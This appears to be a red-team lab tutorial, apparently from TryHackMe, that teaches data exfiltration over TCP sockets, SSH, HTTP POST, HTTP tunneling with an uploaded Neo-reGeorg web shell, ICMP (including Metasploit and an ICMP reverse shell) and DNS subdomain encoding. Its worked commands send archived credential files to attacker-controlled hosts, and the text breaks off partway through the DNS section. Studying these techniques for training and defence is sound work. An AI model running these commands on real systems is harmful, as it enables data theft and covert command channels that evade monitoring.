## Introduction

### Welcome to Data Exfiltration

Cybercriminals use various internet attacks against companies for different purposes. In most cases, many of these attacks end in data breaches, where threat actors steal sensitive data to sell it on the dark web or publish it online.

Someone may ask: how does a threat actor transfer stolen data from a company's network to the outside, also known as a data breach, without being detected? The answer varies. There are many techniques that a threat actor can perform, including data exfiltration.

Data exfiltration is a non-traditional approach for copying and transferring data from a compromised to an attacker's machine. The data exfiltration technique is used to emulate the normal network activities, and It relies on network protocols such as DNS, HTTP, SSH, etc. Data Exfiltration over common protocols is challenging to detect and distinguish between legitimate and malicious traffic.

Some protocols are not designed to carry data over them. However, threat actors find ways to abuse these protocols to bypass network-based security products such as a firewall. Using these techniques as a red teamer is essential to avoid being detected.

### Data Exfiltration

Data Exfiltration is the process of taking an unauthorized copy of sensitive data and moving it from the inside of an organization's network to the outside. It is important to note that Data Exfiltration is a post-compromised process where a threat actor has already gained access to a network and performed various activities to get hands on sensitive data. Data Exfiltration often happens at the last stage of the Cyber Kill Chain model, Actions on Objectives.

Data exfiltration is also used to hide an adversary's malicious activities and bypass security products. For example, the DNS exfiltration technique can evade security products, such as a firewall.

Sensitive data can be in various types and forms, and it may contain the following:

- Usernames and passwords or any authentication information.
- Bank accounts details
- Business strategic decisions.
- Cryptographic keys.
- Employee and personnel information.
- Project code data.

#### How to use Data Exfiltration

There are three primary use case scenarios of data exfiltration, including:

- Exfiltrate data
- Command and control communications.
- Tunneling

**Traditional Data Exfiltration**
![f17f137ed548ee57e703833bd825c14a.png](../img/f17f137ed548ee57e703833bd825c14a.png)

The traditional Data Exfiltration scenario is moving sensitive data out of the organization's network. An attacker can make one or more network requests to transfer the data, depending on the data size and the protocol used. Note that a threat actor does not care about the reply or response to his request. Thus, all traffic will be in one direction, from inside the network to outside. Once the data is stored on the attacker's server, he logs into it and grabs the data.

**C2 Communications**
![2774b3defdccd4c9960635ce1842d210.png](../img/2774b3defdccd4c9960635ce1842d210.png)

Many C2 frameworks provide options to establish a communication channel, including standard and non-traditional protocols to send commands and receive responses from a victim machine. In C2 communications a limited number of requests where an attacker sends a request to execute a command in the victim's machine. Then, the agent's client executes the command and sends a reply with the result over a non-traditional protocol. The communications will go in two directions: into and out of the network.

**Tunneling**
![7618aa31a768f99b0509ade735ff32a3.png](../img/7618aa31a768f99b0509ade735ff32a3.png)

In the Tunneling scenario, an attacker uses this data exfiltration technique to establish a communication channel between a victim and an attacker's machine. The communication channel acts as a bridge to let the attacker machine access the entire internal network. There will be continuous traffic sent and received while establishing the connection.

In the coming tasks, we will discuss the following techniques and use cases:

- Exfiltrate using TCP socket and Base64
- Exfiltrate using SSH
- Exfiltrate using HTTPS (POST request)
- ICMP
- DNS

## Exfiltration using TCP socket

This task shows how to exfiltrate data over TCP using data encoding. Using the TCP socket is one of the data exfiltration techniques that an attacker may use in a non-secured environment where they know there are no network-based security products. If we are in a well-secured environment, then this kind of exfiltration is not recommended. This exfiltration type is easy to detect because we rely on non-standard protocols.

Besides the TCP socket, we will also use various other techniques, including data encoding and archiving. One of the benefits of this technique is that it encodes the data during transmission and makes it harder to examine.

The following diagram explains how traditional communications over TCP work. If two machines want to communicate, then one of them has to listen and wait for the incoming traffic. It is similar to how two people talk and communicate, where one of them is listening, and the other person is speaking.

![62a3f5310581794c8caafa356ebcf249.png](../img/62a3f5310581794c8caafa356ebcf249.png)

The diagram shows that two hosts communicate over TCP on port 1337 in the following steps:

1.  The first machine is listening over TCP on port **1337**
2.  The other machine connects to the port specified in step 1. For example, **nc 1.2.3.4 1337**
3.  The first machine establishes the connection
4.  Finally, the sending and receiving data starts. For example, the attacker sends commands and receives results.

First, we need to prepare a listener on the **JumpBox** on a port you specify. In our case, we choose port `8080`.

```bash
thm@jump-box$ nc -lvp 8080 > /tmp/task4-creds.data
Listening on [0.0.0.0] (family 0, port 8080)
```

We have the required data ready to be transmitted on the victim machine. In this case, we have a sample file with a couple of credentials.

```bash
thm@victim1:~$ cat task4/creds.txt
admin:password
Admin:123456
root:toor
```

Now that we have the credential text file, we will use the TCP socket to exfiltrate it. **Make sure the listener is running on the JumpBox.**

```bash
thm@victim1:~$ tar zcf - task4/ | base64 | dd conv=ebcdic > /dev/tcp/192.168.0.133/8080
0+1 records in
0+1 records out
244 bytes copied, 0.120012 s, 2.0 kB/s
```

Let's break down the previous command and explain it:

1.  We used the `tar` command to create an archive file with the `zcf` arguments of the content of the secret directory.
2.  The `z` is for using gzip to compress the selected folder, the `c` is for creating a new archive, and the `f` is for using an archive file.
3.  We then passed the created tar file to the base64 command for converting it to base64 representation.
4.  Then, we passed the result of the base64 command to create and copy a backup file with the `dd` command using EBCDIC encoding data.
5.  Finally, we redirect the `dd` command's output to transfer it using the TCP socket on the specified IP and port, which in this case, port `8080`.

Note that we used the Base64 and EBCDIC encoding to protect the data during the exfiltration. If someone inspects the traffic, it would be in a non-human readable format and wouldn't reveal the transmitted file type.

Once we hit enter, we should receive the encoded data in the `/tmp/` directory.

```bash
thm@jump-box:~$ nc -lvp 8080 > /tmp/task4-creds.data
Listening on 0.0.0.0 8080
Connection received on victim-thm1.thm-pri-net 58012
thm@jump-box:~$ ls -la /tmp/
total 16
drwxrwxrwt 1 root root 4096 Apr 17 11:47 .
drwxr-xr-x 1 root root 4096 Jun 20  2022 ..
-rw-r--r-- 1 thm  root  244 Apr 17 11:50 task4-creds.data
drwx------ 2 thm  root 4096 Apr 17 11:30 tmux-1000
```

On the JumpBox, we need to convert the received data back to its original status. We will be using the `dd` tool to convert it back.

```bash
thm@jump-box:~$ cd /tmp
thm@jump-box:/tmp$ dd conv=ascii if=task4-creds.data |base64 -d > task4-creds.tar
0+1 records in
0+1 records out
244 bytes copied, 0.000192671 s, 1.3 MB/s
```

The following is the explanation of the previous command:

1.  We used the `dd` command to convert the received file to `ASCII` representation. We used the `task4-creds.data` as input to the `dd` command.
2.  The output of the `dd` command will be passed to the base64 to decode it using the `-d` argument.
3.  Finally, we save the output in the `task4-creds.tar` file.

Next, we need to use the `tar` command to unarchive the `task4-creds.tar` file and check the content as follows:

```bash
thm@jump-box:/tmp$ tar xvf task4-creds.tar
task4/
task4/creds.txt
```

Let's break down the previous command and explain it:

1.  We used the `tar` command to unarchive the file with the `xvf` arguments.
2.  The `x` is for extracting the tar file, the `v` for verbosely listing files, and the `f` is for using an archive file.

Now let's confirm that we have the same data from the victim machine.

```bash
thm@jump-box:/tmp$ cat task4/creds.txt 
admin:password
Admin:123456
root:toor
```

## Exfiltration using SSH

In this task we will show how to use SSH protocol to exfiltrate data over to an attacking machine. SSH protocol establishes a secure channel to interact and move data between the client and server, so all transmission data is encrypted over the network or the Internet.

![1de1b460462edb746898dd8b56ab5894.png](../img/1de1b460462edb746898dd8b56ab5894.png)

To transfer data over the SSH, we can use either the Secure Copy Protocol SCP or the SSH client. Let's assume that we don't have the SCP command available to transfer data over SSH.

Let's assume that we have gained access to sensitive data that must be transmitted securely.

```bash
thm@victim1:~$ cat task5/creds.txt
admin:password
Admin:123456
root:toor
```

Let's use the tar command to archive the data and then transfer it.

```bash
thm@victim1:~$ tar cf - task5/ | ssh thm@jump.thm.com "cd /tmp/; tar xpf -"
The authenticity of host 'jump.thm.com (192.168.0.133)' can't be established.
ECDSA key fingerprint is SHA256:Ks0kFNo7GTsv8uM8bW78FwCCXjvouzDDmATnx1NhbIs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'jump.thm.com,192.168.0.133' (ECDSA) to the list of known hosts.
thm@jump.thm.com's password:
```

Let's break down the previous command and explain it:

1.  We used the `tar` command the same as the previous task to create an archive file of the `task5` directory.
2.  Then we passed the archived file over the ssh. SSH clients provide a way to execute a single command without having a full session.
3.  We passed the command that must be executed in double quotations, `"cd /tmp/; tar xpf`. In this case, we change the directory and unarchive the passed file.

If we check the attacker machine, we can see that we have successfully transmitted the file.

```bash
thm@jump-box$ cd /tmp/task5/
thm@jump-box:/tmp/task5$ cat creds.txt
admin:password
Admin:123456
root:toor
```

## Exfiltrate using HTTP(S)

### HTTP POST Request

Exfiltration data through the HTTP protocol is one of the best options because it is challenging to detect. It is tough to distinguish between legitimate and malicious HTTP traffic. We will use the POST HTTP method in the data exfiltration, and the reason is with the GET request, all parameters are registered into the log file. While using POST request, it doesn't. The following are some of the POST method benefits:

- POST requests are never cached
- POST requests do not remain in the browser history
- POST requests cannot be bookmarked
- POST requests have no restrictions on **data length**

```bash
thm@web-thm:~$ sudo cat /var/log/apache2/access.log
192.168.0.133 - - [29/Apr/2022:11:41:54 +0100] "GET /example.php?flag=VEhNe0g3N1AtRzM3LTE1LWYwdW42fQo= HTTP/1.1" 200 495 "-" "curl/7.68.0"
192.168.0.133 - - [29/Apr/2022:11:42:14 +0100] "POST /example.php HTTP/1.1" 200 395 "-" "curl/7.68.0"
```

Obviously, the first line is a GET request with a file parameter with exfiltrated data. If you try to decode it using the based64 encoding, you would get the transmitted data. While the second request is a POST to `example.php`, we sent the same base64 data, but it doesn't show what data was transmitted.

In a typical real-world scenario, an attacker controls a web server in the cloud somewhere on the Internet. An agent or command is executed from a compromised machine to send the data outside the compromised machine's network over the Internet into the webserver. Then an attacker can log in to a web server to get the data, as shown in the following figure.

![4256302202d88ba26fc5f7dcf83803bc.png](../img/4256302202d88ba26fc5f7dcf83803bc.png)

### HTTP Data Exfiltration

Based on the attacker configuration, we can set up either HTTP or HTTPS, the encrypted version of HTTP. We also need a PHP page that handles the POST HTTP request sent to the server.

We will be using the HTTP protocol (not the HTTPS) in our scenario.

To exfiltrate data over the HTTP protocol, we can apply the following steps:

1.  An attacker sets up a web server with a data handler. In our case, it will be `web.thm.com` and the `contact.php` page as a data handler.
2.  A C2 agent or an attacker sends the data. In our case, we will send data using the `curl` command.
3.  The webserver receives the data and stores it. In our case, the `contact.php` receives the POST request and stores it into `/tmp`.
4.  The attacker logs into the webserver to have a copy of the received data.

First, we prepared a webserver with a data handler for this task. The following code snapshot is of PHP code to handle POST requests via a `file` parameter and stores the received data in the `/tmp` directory as `http.bs64` file name.

```php
<?php 
if (isset($_POST['file'])) {
        $file = fopen("/tmp/http.bs64","w");
        fwrite($file, $_POST['file']);
        fclose($file);
   }
?>
```

The goal is to transfer the folder's content, stored in `/home/thm/task6`, to another machine over the HTTP protocol.

Now that we have our data, we will be using the `curl` command to send an HTTP POST request with the content of the secret folder as follows:

```bash
thm@victim1:~$ curl --data "file=$(tar zcf - task6 | base64)" http://web.thm.com/contact.php
```

We used the `curl` command with `--data` argument to send a `POST` request via the `file` parameter. Note that we created an archived file of the secret folder using the `tar` command. We also converted the output of the `tar` command into base64 representation.

Next, from the **victim1 or JumpBox** machine, let's log in to the webserver, `web.thm.com`, and check the `/tmp` directory if we have successfully transferred the required data.

```bash
thm@web-thm:~$ ls -l /tmp/
total 4
-rw-r--r-- 1 www-data www-data 243 Apr 17 10:37 http.bs64
thm@web-thm:~$ cat /tmp/http.bs64
H4sIAAAAAAAAA 3RPQ4CIRCGYeo9BSdQQGATO49CXAtjFAMYPb672G38qYgxvk8zDFDM5CshH/xS
NKVGvXO1jua1nrU1ziqle2 E0sorJ6RrO9bDJZeQpBQpxvLu36f3H1Vq/tu0G/Ki3NpsOAXsrX2d
v/Wz/I0dr6RqMs3Mn cfhuP tD6HnK8xDd2mttqsrPPdtPK6xJi6b08JAAAAAAAAAAAAAAAA4Jk7
FWUx0QAoAAA=
```

Nice! We have received the data, but if you look closely at the `http.bs64` file, you can see it is broken base64. This happens due to the URL encoding over the HTTP. The `+` symbol has been replaced with empty spaces, so let's fix it using the `sed` command as follows:

```bash
thm@web-thm:~$ sudo sed -i 's/ /+/g' /tmp/http.bs64
```

Using the `sed` command, we replaced the spaces with `+` characters to make it a valid base64 string!

```bash
thm@web-thm:~$ cat /tmp/http.bs64 | base64 -d | tar xvfz -
task6/
task6/creds.txt
```

Finally, we decoded the `base64` string using the base64 command with `-d` argument, then we passed the decoded file and unarchived it using the `tar` command.

### HTTPS Communications

In the previous section, we showed how to perform Data Exfiltration over the HTTP protocol which means all transmitted data is in cleartext. One of the benefits of HTTPS is encrypting the transmitted data using SSL keys stored on a server.

If you apply the same technique we showed previously on a web server with SSL enabled, then we can see that all transmitted data will be encrypted.

![7709ca9130dc5caf6057e67874b2e2bb.png](../img/7709ca9130dc5caf6057e67874b2e2bb.png)

As shown in the screenshot, we captured the network traffic and it seems that all client and server communications on port `443` are encrypted.

### HTTP Tunneling

Tunneling over the HTTP protocol technique encapsulates other protocols and sends them back and forth via the HTTP protocol. HTTP tunneling sends and receives many HTTP requests depending on the communication channel!

Before diving into HTTP tunneling details, let's discuss a typical scenario where many internal computers are not reachable from the Internet. For example, in our scenario, the `uploader.thm.com` server is reachable from the Internet and provides web services to everyone. However, the `app.thm.com` server runs locally and provides services only for the internal network as shown in the following figure:
![bd26baab708e69bac9b9e51c64399ae9.png](../img/bd26baab708e69bac9b9e51c64399ae9.png)

For HTTP Tunneling, we will be using a [Neo-reGeorg](https://github.com/L-codes/Neo-reGeorg) tool to establish a communication channel to access the internal network devices.

Next, we need to generate an encrypted client file to upload it to the victim web server as follows:

```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/Neo-reGeorg]
└─$ python3 neoreg.py generate -k thm


          "$$$$$$''  'M$  '$$$@m
        :$$$$$$$$$$$$$$''$$$$'
       '$'    'JZI'$$&  $$$$'
                 '$$$  '$$$$
                 $$$$  J$$$$'
                m$$$$  $$$$,
                $$$$@  '$$$$_          Neo-reGeorg
             '1t$$$$' '$$$$<
          '$$$$$$$$$$'  $$$$          version 5.0.1
               '@$$$$'  $$$$'
                '$$$$  '$$$@
             'z$$$$$$  @$$$
                r$$$   $$|
                '$$v c$$
               '$$v $$v$$$$$$$$$#
               $$x$$$$$$$$$twelve$$$@$'
             @$$$@L '    '<@$$$$$$$$`
           $$                 '$$$


    [ Github ] https://github.com/L-codes/Neo-reGeorg

    [+] Mkdir a directory: neoreg_servers
    [+] Create neoreg server files:
       => neoreg_servers/tunnel.jsp
       => neoreg_servers/tunnel.ashx
       => neoreg_servers/tunnel.go
       => neoreg_servers/tunnel.jspx
       => neoreg_servers/tunnel.aspx
       => neoreg_servers/tunnel.php
```

The previous command generates encrypted Tunneling clients with `thm` key in the `neoreg_servers/` directory. Note that there are various extensions available, including PHP, ASPX, JSP, etc. In our scenario, we will be uploading the `tunnel.php` file via the uploader machine.

![09caeca713c9ee4a609717586a0013da.png](../img/09caeca713c9ee4a609717586a0013da.png)

To upload the PHP file, use `admin` as the key to let you upload any files into the `uploader.thm.com`.

We need to use the `neoreg.py` to connect to the client and provide the key to decrypt the tunneling client. We also need to provide a URL to the PHP file that we uploaded on the uploader machine.

Once it is connected to the tunneling client, we are ready to use the tunnel connection as a proxy binds on our local machine, `127.0.0.1`, on port `1080`.

For example, if we want to access the `app.thm.com`, which has an internal IP address `172.20.0.121` on port `80`, we can use the curl command with `--socks5` argument. We can also use other proxy applications, such as ProxyChains, FoxyProxy, etc., to communicate with the internal network.

```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/tryhackme/Neo-reGeorg]
└─$ curl --socks5 127.0.0.1:1080 http://172.20.0.121:80
Welcome to APP Server!
```

The following diagram shows the traffic flow as it goes through the uploader machine and then communicates with the internal network devices, which in this case, is the App machine. Note that if we check the network traffic from the App machine, we see that the source IP address of incoming traffic comes from the uploader machine.

![600f0e5390d65450b547d6c6bcf3573c.png](../img/600f0e5390d65450b547d6c6bcf3573c.png)

## Exfiltration using ICMP

Network devices such as routers use `ICMP` protocol to check network connectivities between devices. Note that the ICMP protocol is not a transport protocol to send data between devices. Let's say that two hosts need to test the connectivity in the network; then, we can use the `ping` command to send `ICMP` packets through the network, as shown in the following figure.
![f4e4ae048b4b3eaf24a0e85ed8140f01.png](../img/f4e4ae048b4b3eaf24a0e85ed8140f01.png)

The `HOST1` sends an ICMP packet with an **echo-request** packet. Then, if `HOST2` is available, it sends an `ICMP` packet back with an **echo reply** message confirming the availability.

### ICMP Data Section

On a high level, the `ICMP` packet's structure contains a `Data` section that can include strings or copies of other information, such as the IPv4 header, used for error messages. The following diagram shows the `Data` section, which is optional to use.
![4c19e2b0c9b2c1e49a5ad552e59c56e6.png](../img/4c19e2b0c9b2c1e49a5ad552e59c56e6.png)

Note that the `Data` field is optional and could either be empty or it could contain a random string during the communications. As an attacker, we can use the `ICMP` structure to include our data within the `Data` section and send it via `ICMP` packet to another machine. The other machine must capture the network traffic with the `ICMP` packets to receive the data.

To perform manual `ICMP` data exfiltration, we need to discuss the `ping` command a bit more. The `ping` command is a network administrator software available in any operating system. It is used to check the reachability and availability by sending `ICMP` packets, which can be used as follows:

```bash
thm@AttackBox$ ping 10.10.191.192 -c 1
```

We choose to send one `ICMP` packet from Host 1, our AttackBox, to Host 2, the target machine, using the `-c 1` argument from the previous command. Now let's examine the `ICMP` packet in Wireshark and see what the Data section looks like.

![300a274a365ecbb9d6562ac469669da8.png](../img/300a274a365ecbb9d6562ac469669da8.png)

The ping command in the Linux OS has an interesting `ICMP` option. With the `-p` argument, we can specify 16 bytes of data in hex representation to send through the packet. Note that the `-p` option is only available for Linux operating systems. We can confirm that by checking the ping's help manual page.

![16248206139a03bc445deaa11cbdd736.png](../img/16248206139a03bc445deaa11cbdd736.png)

Let's say that we need to exfiltrate the following credentials `thm:tryhackme`. First, we need to convert it to its Hex representation and then pass it to the `ping` command using `-p` options as follows:

```bash
root@AttackBox$ echo "thm:tryhackme" | xxd -p 
74686d3a7472796861636b6d650a
```

We used the `xxd` command to convert our string to Hex, and then we can use the `ping` command with the Hex value we got from converting the `thm:tryhackme`.

```bash
root@AttackBox$ ping 10.10.191.192 -c 1 -p 74686d3a7472796861636b6d650a
```

We sent one ICMP packet using the ping command with `thm:tryhackme` Data. Let's look at the Data section for this packet in the Wireshark.
![d721604b39ad5dd20882b09f6048fa09.png](../img/d721604b39ad5dd20882b09f6048fa09.png)

### ICMP Data Exfiltration

Now that we have the basic fundamentals of manually sending data over ICMP packets, let's discuss how to use Metasploit to exfiltrate data. The Metasploit framework uses the same technique explained in the previous section. However, it will capture incoming ICMP packets and wait for a Beginning of File (BOF) trigger value. Once it is received, it writes to the disk until it gets an End of File (EOF) trigger value. The following diagram shows the required steps for the Metasploit framework.

![3a876d0cf7c4140ef21f6c917538923f.png](../img/3a876d0cf7c4140ef21f6c917538923f.png)

Let's set up the Metasploit framework by selecting the `icmp_exfil` module to make it ready to capture and listen for `ICMP` traffic. One of the requirements for this module is to set the `BPF_FILTER` option, which is based on TCPDUMP rules, to capture only `ICMP` packets and ignore any `ICMP` packets that have the source IP of the attacking machine as follows:

```bash
┌──(parallels㉿kali-linux-2022-2)-[~]
└─$ msfconsole -q    
msf6 > use auxiliary/server/icmp_exfil
msf6 auxiliary(server/icmp_exfil) > set BPF_FILTER icmp and not src 10.14.45.90
BPF_FILTER => icmp and not src 10.14.45.90
msf6 auxiliary(server/icmp_exfil) > 
```

We also need to select which network interface to listen to, `tun0`. Finally, executes `run` to start the module.

```bash
msf6 auxiliary(server/icmp_exfil) > run

[*] ICMP Listener started on tun0 (10.14.45.90). Monitoring for trigger packet containing ^BOF
[*] Filename expected in initial packet, directly following trigger (e.g. ^BOFfilename.ext)
```

Let's use the [nping](https://nmap.org/nping/) tool, an open-source tool for network packet generation, response analysis, and response time measurement. The NPING tool is part of the NMAP suite tools.

First, we will send the BOF trigger from the ICMP machine so that the Metasploit framework starts writing to the disk.

```bash
thm@icmp-host:~$ sudo nping --icmp -c 1 10.14.45.90 --data-string "BOFfile.txt"
[sudo] password for thm: 

Starting Nping 0.7.80 ( https://nmap.org/nping ) at 2023-04-17 15:41 EEST
SENT (0.0442s) ICMP [192.168.0.121 > 10.14.45.90 Echo request (type=8/code=0) id=36447 seq=1] IP [ttl=64 id=57565 iplen=39 ]
RCVD (0.0807s) ICMP [10.14.45.90 > 192.168.0.121 Echo reply (type=0/code=0) id=36447 seq=1] IP [ttl=62 id=5984 iplen=39 ]
 
Max rtt: 36.410ms | Min rtt: 36.410ms | Avg rtt: 36.410ms
Raw packets sent: 1 (39B) | Rcvd: 1 (39B) | Lost: 0 (0.00%)
Nping done: 1 IP address pinged in 1.07 seconds
```

We sent one ICMP packet using the `nping` command with `--data-string` argument. We specify the trigger value with the file name `BOFfile.txt`, set by default in the Metasploit framework. This could be changed from Metasploit if needed!

Now check the AttackBox terminal. If everything is set correctly, the Metasploit framework should identify the trigger value and wait for the data to be written to disk.

Let's start sending the required data and the end of the file trigger value from the ICMP machine.

```bash
thm@icmp-host:~$ sudo nping --icmp -c1 10.14.45.90 --data-string "BOFfile.txt"

Starting Nping 0.7.80 ( https://nmap.org/nping ) at 2023-04-17 16:04 EEST
SENT (0.0277s) ICMP [192.168.0.121 > 10.14.45.90 Echo request (type=8/code=0) id=58169 seq=1] IP [ttl=64 id=3116 iplen=39 ]
RCVD (0.0287s) ICMP [10.14.45.90 > 192.168.0.121 Echo reply (type=0/code=0) id=58169 seq=1] IP [ttl=63 id=15883 iplen=39 ]
RCVD (0.0751s) ICMP [10.14.45.90 > 192.168.0.121 Echo reply (type=0/code=0) id=58169 seq=1] IP [ttl=31 id=39737 iplen=32 ]
 
Max rtt: 47.331ms | Min rtt: 0.862ms | Avg rtt: 24.096ms
Raw packets sent: 1 (39B) | Rcvd: 2 (71B) | Lost: 0 (0.00%)
Nping done: 1 IP address pinged in 1.06 seconds
thm@icmp-host:~$ sudo nping --icmp -c1 10.14.45.90 --data-string "admin:password"

Starting Nping 0.7.80 ( https://nmap.org/nping ) at 2023-04-17 16:04 EEST
SENT (0.0322s) ICMP [192.168.0.121 > 10.14.45.90 Echo request (type=8/code=0) id=27766 seq=1] IP [ttl=64 id=19022 iplen=42 ]
RCVD (0.0326s) ICMP [10.14.45.90 > 192.168.0.121 Echo reply (type=0/code=0) id=27766 seq=1] IP [ttl=63 id=19336 iplen=42 ]
RCVD (0.0680s) ICMP [10.14.45.90 > 192.168.0.121 Echo reply (type=0/code=0) id=27766 seq=1] IP [ttl=31 id=36773 iplen=30 ]
 
Max rtt: 35.729ms | Min rtt: 0.326ms | Avg rtt: 18.027ms
Raw packets sent: 1 (42B) | Rcvd: 2 (72B) | Lost: 0 (0.00%)
Nping done: 1 IP address pinged in 1.06 seconds
thm@icmp-host:~$ sudo nping --icmp -c1 10.14.45.90 --data-string "admin2:password2"

Starting Nping 0.7.80 ( https://nmap.org/nping ) at 2023-04-17 16:04 EEST
SENT (0.0303s) ICMP [192.168.0.121 > 10.14.45.90 Echo request (type=8/code=0) id=33659 seq=1] IP [ttl=64 id=15695 iplen=44 ]
RCVD (0.0310s) ICMP [10.14.45.90 > 192.168.0.121 Echo reply (type=0/code=0) id=33659 seq=1] IP [ttl=63 id=20588 iplen=44 ]
RCVD (0.0664s) ICMP [10.14.45.90 > 192.168.0.121 Echo reply (type=0/code=0) id=33659 seq=1] IP [ttl=31 id=8798 iplen=30 ]
 
Max rtt: 36.080ms | Min rtt: 0.641ms | Avg rtt: 18.360ms
Raw packets sent: 1 (44B) | Rcvd: 2 (74B) | Lost: 0 (0.00%)
Nping done: 1 IP address pinged in 1.06 seconds
thm@icmp-host:~$ sudo nping --icmp -c1 10.14.45.90 --data-string "EOF"

Starting Nping 0.7.80 ( https://nmap.org/nping ) at 2023-04-17 16:04 EEST
SENT (0.0322s) ICMP [192.168.0.121 > 10.14.45.90 Echo request (type=8/code=0) id=64271 seq=1] IP [ttl=64 id=58806 iplen=31 ]
RCVD (0.0325s) ICMP [10.14.45.90 > 192.168.0.121 Echo reply (type=0/code=0) id=64271 seq=1] IP [ttl=63 id=22151 iplen=31 ]
RCVD (0.2525s) ICMP [10.14.45.90 > 192.168.0.121 Echo reply (type=0/code=0) id=64271 seq=1] IP [ttl=31 id=16484 iplen=36 ]
 
Max rtt: 220.311ms | Min rtt: 0.297ms | Avg rtt: 110.304ms
Raw packets sent: 1 (31B) | Rcvd: 2 (67B) | Lost: 0 (0.00%)
Nping done: 1 IP address pinged in 1.06 seconds
```

Let's check our AttackBox once we have done sending the data and the ending trigger value.

```bash
msf6 auxiliary(server/icmp_exfil) > run

[*] ICMP Listener started on ens5 (10.14.45.90). Monitoring for trigger packet containing ^BOF
[*] Filename expected in initial packet, directly following trigger (e.g. ^BOFfilename.ext)
[+] Beginning capture of "file.txt" data
[*] 30 bytes of data recevied in total
[+] End of File received. Saving "file.txt" to loot
[+] Incoming file "file.txt" saved to loot
[+] Loot filename: /root/.msf4/loot/20230417140448_default_10.14.45.90_icmp_exfil_057757.txt
```

### ICMP C2 Communication

Next, we will show executing commands over the ICMP protocol using the [ICMPDoor](https://github.com/krabelize/icmpdoor) tool. ICMPDoor is an open-source reverse-shell written in Python3 and scapy. The tool uses the same concept we discussed earlier in this task, where an attacker utilizes the Data section within the ICMP packet. The only difference is that an attacker sends a command that needs to be executed on a victim's machine. Once the command is executed, a victim machine sends the execution output within the ICMP packet in the Data section.

![b34d456f4092dab86d042b2018a82df4.png](../img/b34d456f4092dab86d042b2018a82df4.png)

First, we need to execute the `icmpdoor` binary as follows:

```bash
thm@icmp-host:~$ sudo icmpdoor -i eth0 -d 192.168.0.133
```

Next, log in to the JumpBox and execute the `icmp-cnc` binary to communicate with the victim, our ICMP-Host. Once the execution runs correctly, a communication channel is established over the ICMP protocol. Now we are ready to send the command that needs to be executed on the victim machine.

```bash
thm@jump-box:~$ sudo icmp-cnc -i eth1 -d 192.168.0.121
shell: hostname
hostname
shell: icmp-host
```

Similar to the client-side binary, ensure to select the interface for the communication as well as the destination IP. As the previous terminal shows, we requested to execute the `hostname` command, and we received `icmp-host`.

To confirm that all communications go through the ICMP protocol, we capture the network traffic during the communication using tcpdump as the following:
![fd5fa8ba4c3e304abd07afadd12976fc.png](../img/fd5fa8ba4c3e304abd07afadd12976fc.png)

## Exfiltration over DNS

To perform exfiltration via the DNS protocol, you need to control a domain name and set up DNS records, including NS, A, or TXT.

The DNS protocol is a common protocol and Its primary purpose is to resolve domain names to IP addresses and vice versa. Even though the DNS protocol is not designed to transfer data, threat actors found a way to abuse and move data over it. This task shows a technique to exfiltrate data over the DNS protocol.

### What is DNS Data Exfiltration?

Since DNS is not a transport protocol, many organizations don't regularly monitor the DNS protocol! The DNS protocol is allowed in almost all firewalls in any organization network. For those reasons, threat actors prefer using the DNS protocol to hide their communications.

The DNS protocol has limitations that need to be taken into consideration, which are as follows,

- The maximum length of the Fully Qualified **FQDN** domain name (including .separators) is **255** characters.
- The subdomain name (label) length must not exceed **63** characters (not including .com, .net, etc).

![26f9f490132762d70fe000ffdf13305a.png](../img/26f9f490132762d70fe000ffdf13305a.png)

Based on these limitations, we can use a limited number of characters to transfer data over the domain name. If we have a large file, 10 MB for example, it may need more than 50000 DNS requests to transfer the file completely. Therefore, it will be noisy traffic and easy to notice and detect.

Now let's discuss the Data Exfiltration over DNS requirements and steps, which are as follows:
![27924f08c47ede5b5f5ee0e2811a5d9b.png](../img/27924f08c47ede5b5f5ee0e2811a5d9b.png)

1.  An attacker registers a domain name, for example, **tunnel.com**
2.  The attacker sets up tunnel.com's NS record points to a server that the attacker controls.
3.  The malware or the attacker sends sensitive data from a victim machine to a domain name they control—for example, passw0rd.tunnel.com, where **passw0rd** is the data that needs to be transferred.
4.  The DNS request is sent through the local DNS server and is forwarded through the Internet.
5.  The attacker's authoritative DNS (malicious server) receives the DNS request.
6.  Finally, the attacker extracts the password from the domain name.

### When do we need to use the DNS Data Exfiltration?

There are many use case scenarios, but the typical one is when the firewall blocks and filters all traffic. We can pass data or TCP/UDP packets through a firewall using the DNS protocol, but it is important to ensure that the DNS is allowed and resolving domain names to IP addresses.
![700c87122514caaadd79d851fe84d088.png](../img/700c87122514caaadd79d851fe84d088.png)

### DNS Configuration

| DNS Record | Type | Value |
| --- | --- | --- |
| t1ns.tunnel.com | A   | 10.14.45.90 |
| t1.tunnel.com | NS  | t1ns.tunnel.com |

### DNS Data Exfiltration

Now let's explain the manual DNS Data Exfiltration technique and show how it works. Assume that we have a `creds.txt` file with sensitive data, such as credit card information. To move it over the DNS protocol, we need to encode the content of the file and attach it as a subdomain name as follows:
![500c3d0ab5c2bb49c37e400b81344204.png](../img/500c3d0ab5c2bb49c37e400b81344204.png)

1.  Get the required data that needs to be transferred.
2.  Encode the file using one of the encoding techniques.
3.  Send the encoded characters as subdomain/labels.
4.  Consider the limitations of the DNS protocol. Note that we can add as much data as we can to the domain name, but we must keep the whole URL under 255 characters, and each subdomain label can't exceed 63 characters. If we do exceed these limits, we split the data and send more DNS requests

In order to receive any DNS request, we need to capture the network traffic for any incoming **UDP/53** packets using the `tcpdump` tool.

```bash
thm@attacker:~$ sudo tcpdump -i eth0 udp port 53 -v 
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
```

In order to send the content of a file, we need to convert it into a string representation which could be done using any encoding representation such as Base64, Hex, Binary, etc. In our case, we encode the file using Base64 as follows:

```bash
thm@victim2:~$ cat task9/credit.txt | base64
TmFtZTogVEhNLXVzZXIKQWRkcmVzczogMTIzNCBJbnRlcm5ldCwgVEhNCkNyZWRpdCBDYXJkOiAx
MjM0LTEyMzQtMTIzNC0xMjM0CkV4cGlyZTogMDUvMDUvMjAyMgpDb2RlOiAxMzM3Cg==
```

Now that we have the Base64 representation, we need to split it into one or multiple DNS requests depending on the output's length (DNS limitations) and attach it as a subdomain name. Let's show both ways starting with splitting for multiple DNS requests.

```bash
thm@victim2:~$ cat task9/credit.txt | base64 | tr -d "\n"| fold -w18 | sed -r 's/.*/&.t1.tunnel.com/'
TmFtZTogVEhNLXVzZX.t1.tunnel.com
IKQWRkcmVzczogMTIz.t1.tunnel.com
